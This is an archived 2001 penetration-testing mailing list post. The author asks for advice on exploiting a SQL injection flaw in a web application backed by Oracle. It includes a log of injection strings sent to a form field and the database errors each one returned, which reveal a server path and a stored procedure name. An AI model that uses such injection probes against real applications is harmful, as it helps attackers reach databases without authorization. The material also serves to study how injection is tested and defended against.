Penetration Testing mailing list archives

SQL INJECTION - ORACLE

From: "foo bar" <badb0t () hotmail com>
Date: Mon, 10 Dec 2001 16:06:05 +0000

Hello
I am performing a vulnerability test against a web application and would like some advice. The application is running IIS 4.0 - all the remote exploits are patched. The backend is just a bunch of VB scripts, getting info from an oracle8 server on AIX.

Most of the places where input is accepted must strip out unexpected characters, but I located one field on a form where input was not properly validated. I've tried posting different strings into the field with limited success. All I'm able to get is errors back. I'd like to take advantage of some stored procedures in oracle. Could you look at the log of my activity below and provide advice on where to go next in order to compromise the database, or the server itself? I'd even be happy with the ability to run a successful query through injection. It looks like their using a package or stored procedure to post the query, and I'm having trouble breaking out of it. Is it possible, if so, how should I go about it?

Input: '
Result:

[Microsoft][ODBC driver for Oracle][Oracle]ORA-00907: missing right parenthesis

E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128

Input: ')
Result:

[Microsoft][ODBC driver for Oracle][Oracle]ORA-00923: FROM keyword not found where expected

E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128

Input: ') from
Result:

[Microsoft][ODBC driver for Oracle][Oracle]ORA-00903: invalid table name

E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128

Input: ') from policy
Result:

[Microsoft][ODBC driver for Oracle][Oracle]ORA-00933: SQL command not properly ended

E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128

Input: ') from policy -- "'"
Result:

[Microsoft][ODBC driver for Oracle][Oracle]ORA-06553: PLS-306: wrong number or types of arguments in call to 'GETPOLICYNUMBER'

E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128

Input: ') from getpolicynumber -- "'"
Result:

[Microsoft][ODBC driver for Oracle][Oracle]ORA-04044: procedure, function, package, or type is not allowed here

E:\INETPUB\WEBSITE\CLAIM ENTRY\../systemmonitor/AdoRecordCount.asp, line 128